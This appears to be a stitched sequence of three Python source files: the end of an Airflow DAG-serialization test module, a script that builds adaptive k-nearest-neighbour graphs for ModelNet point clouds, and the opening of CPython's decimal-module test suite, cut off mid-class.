op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@pytest.mark.parametrize(
"passed_success_callback, expected_value",
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@pytest.mark.parametrize(
"passed_failure_callback, expected_value",
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
],
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@pytest.mark.parametrize(
"object_to_serialized, expected_output",
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_5', 'task_2', 'task_4'],
),
(
{
"staging_schema": [
{"key:": "foo", "value": "bar"},
{"key:": "this", "value": "that"},
"test_conf",
]
},
{
"staging_schema": [
{"__type": "dict", "__var": {"key:": "foo", "value": "bar"}},
{
"__type": "dict",
"__var": {"key:": "this", "value": "that"},
},
"test_conf",
]
},
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
(
('task_1', 'task_5', 'task_2', 3, ["x", "y"]),
['task_1', 'task_5', 'task_2', 3, ["x", "y"]],
),
],
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Sets are sorted while list and tuple preserve order"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_params_upgrade(self):
serialized = {
"__version": 1,
"dag": {
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"params": {"none": None, "str": "str", "dict": {"a": "b"}},
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.params["none"] is None
assert isinstance(dict.__getitem__(dag.params, "none"), Param)
assert dag.params["str"] == "str"
def test_params_serialize_default(self):
serialized = {
"__version": 1,
"dag": {
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"params": {"str": {"__class": "airflow.models.param.Param", "default": "str"}},
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert isinstance(dict.__getitem__(dag.params, "str"), Param)
assert dag.params["str"] == "str"
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
adaptive_manfold_learning_knn.py | import os
import sys
import numpy as np
import scipy
import scipy.sparse as sp
import matplotlib.pyplot as plt
from sklearn.neighbors import NearestNeighbors
from sklearn.decomposition import PCA
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
# from multiprocessing import Pool as ThreadPool
from time import clock, sleep
import math
def timeit(func):
def wrapper(*args, **kwargs):
starting_time = clock()
result = func(*args, **kwargs)
ending_time = clock()
print('Duration: {}'.format(ending_time - starting_time))
return result
return wrapper
@timeit
def hello():
hello_list = [i for i in range(3)]
print(hello_list)
def process(i):
a = math.sqrt(i * i + 1)
result = [i]
return result
pool = ThreadPool(4)
results = pool.map(process, hello_list)
pool.close()
pool.join()
print(results)
@timeit
def adaptive_knn(filename=None, savename=None, d=2, k_max=16, k_min=None):
if (filename == None):
print("need a file name")
return
modelnet10 = np.load(filename, encoding='latin1', allow_pickle=True)
modelnet10_data = modelnet10.tolist()['data'] #(3991, 1024, 3)
# modelnet10_label = modelnet10.tolist()['label'] #(3991,)
# modelnet10_seg = modelnet10.tolist()['seg_label'] #(n_model, 2048, C)
del modelnet10
print("the dataset shape is {}".format(modelnet10_data.shape))
n_model, n_point, _ = modelnet10_data.shape
print("k_max={}".format(k_max))
start = n_model // 4 * 0
end = n_model
print('process start={},end={}'.format(start, end))
# modelnet10_data=modelnet10_data[start:end]
result_knn = []
# d=2
# k_max=16
if k_min is None: # 6
k_min = d + 4
yita = 0.32
print('k_max={}'.format(k_max))
print('k_min={}'.format(k_min))
print('yita={}'.format(yita))
for model_i in range(start, end):
if (model_i % 100 == 0):
print(model_i)
X = modelnet10_data[model_i] # i-th model, shape=(1024,3)
nbrs = NearestNeighbors(n_neighbors=k_max + 1,
algorithm='ball_tree').fit(X)
distances, indices = nbrs.kneighbors(X)
indx = indices[:, 1:] # nearest 16 neighbors
n, m = X.shape
# STEP 1
rho = [[] for i in range(n)]
result_indx = [[] for i in range(n)]
for i in range(n):
flag = 0
tmp = indx[i]
X_k = np.transpose(X[tmp]) # (nfeatures, npoints)
for j in range(k_max, k_min, -1):
x_i = np.mean(X_k, axis=1).reshape(-1, 1) # (nfeatures, 1)
X_i = X_k - x_i
# compute singular value d=2 (8), k_min=d+4 , yita=0.32
u, sigma, v = np.linalg.svd(X_i, full_matrices=False)
sigma = sigma**2
r_i = np.sqrt(np.sum(sigma[2:]) / np.sum(sigma[:2]))
if r_i < yita:
result_indx[i] = indx[i][:j]
rho[i].append(r_i)
flag = 1
break
rho[i].append(r_i)
X_k = X_k[:, :-1]
if flag == 0:
max_k = np.argmin(rho[i])
result_indx[i] = indx[i][:k_max - max_k]
# STEP 2
for i in range(n):
X1 = X[result_indx[i]].copy() # the neighborhood of i-th point
x2_indx = indx[i][len(result_indx[i]):]
X2 = X[x2_indx] # (N_SMAPLE, N_FEATURE)
if X2.shape[0] == 0:
continue
pca = PCA(n_components=2)
pca.fit(X1)
# pca_score = pca.explained_variance_ratio_
V = pca.components_
# pca_X1=pca.fit_transform(X1)
mypca_X2 = np.dot(X2 - pca.mean_, V.T) # (N_SAMPLE, N_FEATURE')
recover_X2 = pca.inverse_transform(mypca_X2)
do_select = np.linalg.norm(
X2 - recover_X2,
axis=1) <= yita * np.linalg.norm(mypca_X2, axis=1)
NE = [
x2_indx[idx] for idx, ii in enumerate(do_select) if ii == True
] # Neighborhood Expansion
if NE != []:
result_indx[i] = np.append(result_indx[i], NE)
# print(np.linalg.norm(X2-recover_X2,axis=1))
# print(yita*np.linalg.norm(mypca_X2,axis=1))
# print(do_select)
# print(np.linalg.norm(np.dot(X1-pca.mean_,V.T)-pca_X1))
# print(np.linalg.norm(pca.inverse_transform(pca_XX)-XX))
result_knn.append(result_indx)
if (len(result_knn) != end -
start): #n_moddel(list), n_points(list), n_neiberhood(np.array)
raise Exception("len of result_knn!=n_model")
# convert list to sparse matrix
for i in range(end - start):
data = result_knn[i]
row_ = []
col_ = []
for row, cols in enumerate(data):
row_ += [row for _ in cols]
col_ += list(cols)
sp_data = sp.csr_matrix(
(np.ones(len(row_), dtype='int32'), (row_, col_)),
shape=(n_point, n_point))
result_knn[i] = sp_data
# savename='./modelnet/data/modelNet40_train_16nn_GM_adaptive_knn_sparse.npy'
if (savename == None):
# e.g.
# filename = './modelnet/data/modelNet10_train_16nn_GM.npy'
# savename = ./modelnet/data/modelNet10_train_16nn_GM_adaptive_knn.npy
savename = "".join(
filename.split('.npy')) + "_adaptive_knn_sparse_4.npy"
# shapenet 50
np.save(
savename,
np.array({ #'data': modelnet10_data,
'graph': result_knn
#'seg_label': modelnet10_seg,
#'label': modelnet10_label
})) #'label_dict':test_modelnet10_label_dict,
# np.save(savename, np.array(result_knn))
print("saved to {}".format(savename))
def do_work(result_knn, modelnet10_data, start, stop, k_max, d):
result_knn_ = []
for model_i in range(start, stop):
if (model_i % 10 == 0):
print(model_i)
X = modelnet10_data[model_i] # i-th model, shape=(1024,3)
nbrs = NearestNeighbors(n_neighbors=k_max + 1,
algorithm='ball_tree').fit(X)
distances, indices = nbrs.kneighbors(X)
indx = indices[:, 1:] # nearest 16 nerighbors
# d=2
# k_max=16
k_min = d + 4 # 6
n, m = X.shape
# STEP 1
rho = [[] for i in range(n)]
result_indx = [[] for i in range(n)]
yita = 0.32
for i in range(n):
flag = 0
tmp = indx[i]
X_k = np.transpose(X[tmp]) #(nfeatures, npoints)
for j in range(k_max, k_min, -1):
x_i = np.mean(X_k, axis=1).reshape(-1, 1) #(nfeatures, 1)
X_i = X_k - x_i
# compute singular value, d=2 (8), k_min=d+4 , yita=0.32
u, sigma, v = np.linalg.svd(X_i, full_matrices=False)
sigma = sigma**2
r_i = np.sqrt(np.sum(sigma[2:]) / np.sum(sigma[:2]))
if r_i < yita:
result_indx[i] = indx[i][:j]
rho[i].append(r_i)
flag = 1
break
rho[i].append(r_i)
X_k = X_k[:, :-1]
if flag == 0:
max_k = np.argmin(rho[i])
result_indx[i] = indx[i][:k_max - max_k]
# STEP 2
for i in range(n):
X1 = X[result_indx[i]].copy() # neighborhood of i-th point
x2_indx = indx[i][len(result_indx[i]):]
X2 = X[x2_indx] #(N_SMAPLE, N_FEATURE)
if X2.shape[0] == 0:
continue
pca = PCA(n_components=2)
pca.fit(X1)
# pca_score = pca.explained_variance_ratio_
V = pca.components_
# pca_X1=pca.fit_transform(X1)
mypca_X2 = np.dot(X2 - pca.mean_, V.T) #(N_SAMPLE, N_FEATURE')
recover_X2 = pca.inverse_transform(mypca_X2)
do_select = np.linalg.norm(
X2 - recover_X2,
axis=1) <= yita * np.linalg.norm(mypca_X2, axis=1)
NE = [
x2_indx[idx] for idx, ii in enumerate(do_select) if ii == True
] # Neighborhood Expansion
# print("i={}, orig ks={}, NE={}".format(i,X1.shape[0],NE))
# result_indx[i]+=NE
if NE != []:
result_indx[i] = np.append(result_indx[i], NE)
result_knn_.append(result_indx)
result_knn[start:stop] = result_knn_
@timeit
def multi_threads_adaptive_knn(filename=None, savename=None, d=2, k_max=16):
if (filename == None):
print("need a file name")
return
modelnet10 = np.load(filename, encoding='latin1')
modelnet10_data = modelnet10.tolist()['data'] #(3991, 1024, 3)
modelnet10_label = modelnet10.tolist()['label'] #(3991,)
print("the dataset shape is {}".format(modelnet10_data.shape))
n_model, n_point, _ = modelnet10_data.shape
print("k_max={}".format(k_max))
# n_model=40
result_knn = []
for model_i in range(n_model):
if (model_i % 100 == 0):
print(model_i)
X = modelnet10_data[model_i] # model_i-th model shape=(1024,3)
nbrs = NearestNeighbors(n_neighbors=k_max + 1,
algorithm='ball_tree').fit(X)
distances, indices = nbrs.kneighbors(X)
indx = indices[:, 1:] # nearset 16 neighbors
# d=2
# k_max=16
k_min = d + 4 #6
n, m = X.shape
# STEP 1
rho = [[] for i in range(n)]
result_indx = [[] for i in range(n)]
yita = 0.32
for i in range(n):
flag = 0
tmp = indx[i]
X_k = np.transpose(X[tmp]) #(nfeatures, npoints)
for j in range(k_max, k_min, -1):
x_i = np.mean(X_k, axis=1).reshape(-1, 1) #(nfeatures, 1)
X_i = X_k - x_i
#计算奇异值 d=2 (8), k_min=d+4 , yita=0.32
u, sigma, v = np.linalg.svd(X_i, full_matrices=False)
sigma = sigma**2
r_i = np.sqrt(np.sum(sigma[2:]) / np.sum(sigma[:2]))
if r_i < yita:
result_indx[i] = indx[i][:j]
rho[i].append(r_i)
flag = 1
break
rho[i].append(r_i)
X_k = X_k[:, :-1]
if flag == 0:
max_k = np.argmin(rho[i])
result_indx[i] = indx[i][:k_max - max_k]
# STEP 2
for i in range(n):
X1 = X[result_indx[i]].copy() #第i个点的neighborhood
x2_indx = indx[i][len(result_indx[i]):]
X2 = X[x2_indx] #(N_SMAPLE, N_FEATURE)
if X2.shape[0] == 0:
continue
pca = PCA(n_components=2)
pca.fit(X1)
# pca_score = pca.explained_variance_ratio_
V = pca.components_
# pca_X1=pca.fit_transform(X1)
mypca_X2 = np.dot(X2 - pca.mean_, V.T) #(N_SAMPLE, N_FEATURE')
recover_X2 = pca.inverse_transform(mypca_X2)
do_select = np.linalg.norm(
X2 - recover_X2,
axis=1) <= yita * np.linalg.norm(mypca_X2, axis=1)
NE = [
x2_indx[idx] for idx, ii in enumerate(do_select) if ii == True
] # Neighborhood Expansion
# print("i={}, orig ks={}, NE={}".format(i,X1.shape[0],NE))
# result_indx[i]+=NE
if NE != []:
result_indx[i] = np.append(result_indx[i], NE)
# return result_indx
result_knn.append(result_indx)
# pool = ThreadPool(4)
# # result_knn = pool.map(process, range(n_model))
# pool.close()
# pool.join()
# with multiprocessing.Manager() as MG: #重命名
# mydict=MG.dict() #主进程与子进程共享这个字典
# mydict["array"]=np.zeros((3,3)).tolist()
# result_knn=MG.list(result_knn) #主进程与子进程共享这个List
# # mylist.append([1,2])
# modelnet10_data=MG.list(modelnet10_data) #主进程与子进程共享这个List
# # 多线程部分
# #result=multiprocessing.Manager().dict()
# #result['par']=Par
# #result['num']=xy_arrays
# threads=[]
# t1 =multiprocessing.Process(target=do_work,args=(result_knn,modelnet10_data,0,n_model//4,k_max,d))
# threads.append(t1)
# t2 =multiprocessing.Process(target=do_work,args=(result_knn,modelnet10_data,n_model//4,n_model//4*2,k_max,d))
# threads.append(t2)
# t3 =multiprocessing.Process(target=do_work,args=(result_knn,modelnet10_data,n_model//4*2,n_model//4*3,k_max,d))
# threads.append(t3)
# t4 =multiprocessing.Process(target=do_work,args=(result_knn,modelnet10_data,n_model//4*3,n_model,k_max,d))
# threads.append(t4)
# [t.start() for t in threads]
# [t.join() for t in threads]
# print(result_knn)
if (len(result_knn) != n_model):
raise Exception("len of result_knn!=n_model")
# convert list to sparse matrix
for i in range(n_model):
data = result_knn[i]
row_ = []
col_ = []
for row, cols in enumerate(data):
row_ += [row for _ in cols]
col_ += list(cols)
sp_data = sp.csr_matrix(
(np.ones(len(row_), dtype='int32'), (row_, col_)),
shape=(n_point, n_point))
result_knn[i] = sp_data
# savename='./modelnet/data/modelNet40_train_16nn_GM_adaptive_knn_sparse.npy'
if (savename == None):
# e.g.
# filename = './modelnet/data/modelNet10_train_16nn_GM.npy'
# savename = ./modelnet/data/modelNet10_train_16nn_GM_adaptive_knn.npy
savename = "".join(filename.split('.npy')) + "_adaptive_knn_sparse.npy"
# shapenet 50
np.save(savename,
np.array({
'data': modelnet10_data,
'graph': result_knn,
'seg_label': modelnet10.tolist()['seg_label'],
'label': modelnet10_label
})) #'label_dict':test_modelnet10_label_dict,
# np.save(savename, np.array(result_knn))
print("saved to {}".format(savename))
if __name__ == '__main__':
filename = './modelnet/data/modelNet40_test_16nn_GM.npy'
savename = "".join(filename.split('.npy')) + "_adaptive_32knn_sparse.npy"
adaptive_knn(filename=filename, savename=savename, k_max=32, k_min=16)
# abc=np.load(savename, allow_pickle=True)
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
from test.support import (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
import random
import time
import warnings
import inspect
try:
import threading
except ImportError:
threading = None
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file) as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
